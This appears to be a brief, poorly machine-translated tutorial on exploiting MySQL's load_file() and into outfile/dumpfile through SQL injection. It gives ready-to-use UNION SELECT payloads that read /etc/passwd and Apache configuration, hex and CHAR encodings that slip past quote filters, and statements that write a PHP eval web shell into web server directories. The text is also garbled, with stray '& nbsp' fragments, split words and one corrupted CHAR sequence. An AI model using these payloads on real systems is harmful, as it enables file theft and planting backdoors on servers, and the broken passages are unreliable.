Statement Simple memory:
select Load_file ();
Select ' A word ' into outfile ' website path ';
1. Mysql Read and write function(1) Read functionLoad_file ()(2) Write functioninto outfile 'into dumpfile '2. mysql Read function use (1) Read config file statement Select Load_file ('/etc/httpd/conf/httpd.conf ') & nbsp Select Load_file ('/etc/passwd ') (2) Injection point read profile statement & nbsp and 1=2 Union select 1,load_file ('/etc/httpd/conf/httpd.conf '),3,4,5,6 --- and 1=2 Union select 1,load_file ('/etc/passwd '), 3,4,5,6--- (3) Single quote bypass profile read and 1=2 Union select 1,load_file ('/etc/passwd '),3,4,5,6 --- A ND 1=2 Union Select 1,load_file (0x2f6574632f706173737764),3,4,5,6 --- 0x2f6574632f706173737764 to "/ ETC/PASSWD "hex hex conversion result; and 1=2 Union select 1,load_file (CHAR (47 101 116 99 47 112 97 115 115 1 ),3,4,5,6 --- char (47 101 116 99 47 112 97 115 115 119 100) ASCII transcoding for ", etc/passwd"; NOTE: When the browser returns data,It is possible to garbled the problem by using the hex () function to convert the string to "hexadecimal" data in the following format. and 1=2 Union Select 1,Hex(Load_file (Char(47 101 116 99 47 112 97 115 115 119 100))) , 3,4,5,6--- 3. mysql Write function use (1) Write a sentence statement select ' A word ' into outfile '/opt/lampp/htdocs/1.php ' select ' A word ' into DumpFile '/var/w Ww/html/1.php ' (2) injection Point write a sentence statement select ' <?php @eval ($_post[123]);? > ' into outfile '/opt/lampp/htdocs/1.php ' select ' <?php @eval ($_post[123]);? > ' into DumpFile '/var/www/html/1.php '
Mysql Read and write function utilization learning
